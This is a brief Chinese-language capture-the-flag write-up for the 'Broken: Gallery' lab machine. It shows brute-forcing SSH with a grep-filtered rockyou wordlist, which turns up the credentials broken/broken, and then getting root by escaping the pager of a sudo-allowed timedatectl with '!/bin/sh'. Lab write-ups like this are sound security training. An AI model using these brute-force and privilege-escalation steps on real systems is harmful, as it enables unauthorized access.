跳转至

Broken: Gallery

知识整理
ssh爆破
sudo提权

usershell

目标IP:192.168.205.146

服务信息:

22/tcp open  ssh
80/tcp open  http

web服务只是单纯的前端页面,什么都没有,只剩爆破ssh一条路可以走了

cat ~/wordlists/rockyou.txt|grep broken > dic.txt

拆分一个小字典出来,爆破ssh

[22][ssh] host: 192.168.205.146   login: broken   password: broken

登录ssh拿到user权限

rootshell

sudo -l

 (ALL) NOPASSWD: /usr/bin/timedatectl

可以提权

sudo timedatectl list-timezones
!/bin/sh